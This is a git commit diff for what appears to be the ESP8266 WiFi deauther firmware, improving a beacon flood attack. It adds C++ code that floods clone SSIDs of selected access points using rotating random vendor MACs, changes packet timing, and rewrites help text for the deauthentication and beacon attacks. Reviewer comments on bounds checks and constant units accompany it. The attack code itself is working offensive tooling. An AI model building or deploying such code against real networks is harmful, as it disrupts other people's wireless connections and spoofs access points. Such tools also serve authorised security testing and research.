Improved beacon attack

Both attacks should work now
Stefan Kremser
2017-02-24 13:34:20 +01:00
parent 0f3742b6bf
commit a791101d32
5 changed files with 63 additions and 41 deletions


@@ -5,12 +5,12 @@ Attack::Attack(){
}
void Attack::generate(){
Attack::stopAll();
if(debug) Serial.print("generating Macs");
Mac _randomBeaconMac;
uint8_t _randomMacBuffer[6];
beaconAdrs._clear();
do{
getRandomVendorMac(_randomMacBuffer);
for(int i=0;i<6;i++) _randomBeaconMac.setAt(_randomMacBuffer[i],i);
@@ -143,42 +143,64 @@ void Attack::run(){
if(debug) Serial.println(" done ");
}
if(isRunning[1] && currentMillis-prevTime[1] >= 1000){
if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
for(int a=0;a<apScan.results;a++){
if(apScan.isSelected(a)){
String _ssid = apScan.getAPName(a);
int _ssidLen = _ssid.length();
int _restSSIDLen = 32 - _ssidLen;
int _ch = apScan.getAPChannel(a);
Mac _broadcast;
_broadcast.set(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF);
wifi_set_channel(_ch);
int _selectedClients = 0;
for(int i=0;i<clientScan.results;i++){
if(clientScan.getClientSelected(i)){
_selectedClients++;
buildBeacon(beaconAdrs._get(0),clientScan.getClientMac(i),_ssid+" 2",_ch,false);
for(int h=0;h<packetRate;h++) if(send()) packetsCounter[1]++;
for(int c=0;c<macListLen;c++){
String _apName = _ssid;
if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP "
else if(c < _restSSIDLen*2){
_apName = "."+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. ".SAMPLEAP "
} else{
for(int d=0; d < _restSSIDLen-2; d++) _apName += " ";
_apName += (String)c;//e.g. "SAMPLEAP 78"
}
//build a broadcast packet for this AP & SSID
buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
for(int b=0;b<clientScan.results;b++){
if(clientScan.getClientSelected(b)){
_selectedClients++;
//change packet to adress only the selected client
for(int i=0;i<6;i++) packet[4+i] = clientScan.getClientMac(b)._get(i);
if(send()) packetsCounter[1]++;
}
}
//if no clients are selected send the broadcast packet
if(_selectedClients == 0) if(send()) packetsCounter[1]++;
}
if(_selectedClients == 0){
Mac _client;
_client.set(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF);
buildBeacon(beaconAdrs._get(0),_client,_ssid+" 2",_ch,false);
for(int h=0;h<packetRate;h++) if(send()) packetsCounter[1]++;
}
}
}
}
prevTime[1] = millis();
stati[1] = (String)packetsCounter[1]+"pkts/s";
stati[1] = (String)(packetsCounter[1]*10)+"pkts/s";
packetsCounter[1] = 0;
macListChangeCounter++;
if(macListChangeCounter*10 >= macListInterval){
generate();
macListChangeCounter = 0;
}
if(debug) Serial.println(" done ");
}
@@ -203,12 +225,10 @@ void Attack::start(int num){
}
void Attack::stop(int num){
if(isRunning[num]){
isRunning[num] = false;
stati[num] = "ready";
prevTime[num] = millis();
if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
}
if(isRunning[num] && debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
isRunning[num] = false;
stati[num] = "ready";
prevTime[num] = millis();
}
void Attack::stopAll(){
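Review bot: `Attack::stop(int num)` now writes `isRunning[num]`, `stati[num]` and `prevTime[num]` unconditionally and never checks `num` against the array size. The header section of this same commit lowers `attacksNum` from 3 to 2, so a caller that still passes index 2 for the removed "beacon (list)" entry would write past the arrays declared with `[attacksNum]`. Whether such a caller exists cannot be seen here, since one file's diff is suppressed on this page. I would open the function with `if(num < 0 || num >= attacksNum) return;`. The same guard looks worth having in `start(int num)`, whose body lies outside this hunk.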


@@ -12,7 +12,9 @@ extern "C" {
#include "APScan.h"
#include "ClientScan.h"
#define attacksNum 3
#define attacksNum 2
#define macListLen 80
#define macListInterval 5
extern void PrintHex8(uint8_t *data, uint8_t length);
extern void getRandomVendorMac(uint8_t *buf);
@@ -39,13 +41,13 @@ class Attack
bool send();
//attack declarations
const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
const String attackNames[attacksNum] = {"deauth","beacon (clone)"/*,"beacon (list)"*/};
//attack infos
String stati[attacksNum];
unsigned int packetsCounter[attacksNum];
bool isRunning[attacksNum];
const int packetRate = 10 ;
int packetRate = 10;
MacList beaconAdrs;
@@ -75,7 +77,7 @@ class Attack
/* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, //source
/* 22 - 23 */ 0xc0, 0x6c,
/* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00,
/* 32 - 33 */ 0xe8, 0x03, //0x64,0x00 => every 100ms
/* 32 - 33 */ 0x64, 0x00, //0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
/* 34 - 35 */ 0x01, 0x04
/*,0x00, 0x06, //SSID size
0x72, 0x72, 0x72, 0x72, 0x72, 0x72, //SSID
@@ -100,6 +102,8 @@ class Attack
0x00, 0x0f, 0xac, 0x02, //PSK
0x00, 0x00 //RSN capabilities
};
int macListChangeCounter = 0;
};
#endif
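Review bot: `macListInterval` is introduced without a unit, and nothing in the header says how it relates to the new `macListChangeCounter` member. In `Attack::run()` the two meet as `macListChangeCounter*10 >= macListInterval` inside a branch gated on a 100 ms tick, so a reader cannot tell whether 5 means seconds, ticks or something else. A comment on the define, e.g. `#define macListInterval 5 // <unit> between calls to generate()`, would settle it. So would one on the member, e.g. `int macListChangeCounter = 0; // incremented per beacon tick in run(), reset after generate()`. `macListLen` would benefit from a similar one-line comment saying it is the number of entries iterated per selected AP.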

File diff suppressed because one or more lines are too long


@@ -57,13 +57,14 @@ void setup(){
delay(2000);
nameList.begin();
//nameList.clear();
//nameList.clear(); //usefull for debugging the NameList class
nameList.load();
Serial.println("");
Serial.println("starting...");
startWifi();
attack.stopAll();
attack.generate();
/* ========== Web Server ========== */


@@ -37,17 +37,14 @@
<p class="small">
<br>
<b>deauth selected:</b><br>
sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi network.
<b>deauth [deauthentication attack]:</b><br>
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br><br>
<b>deauth all:</b><br>
sends deauthentication frames and dissociation frames as broadcast to all clients in the selected WiFi network.
<b>beacon [beacon flood attack]:</b><br>
Sends beacon frames to the selected client(s) with the same SSID as the selected WiFi access point(s).
<br><br>
<b>beacon spam:</b><br>
sends beacon frames with the same SSID as the selected WiFi access point.
<br><br>
<b>random beacon spam:</b><br>
sends beacon frames with a random SSID .
<b>Note:</b><br>
If no client is selected, the packets are sent as broadcast!
<br>
</p>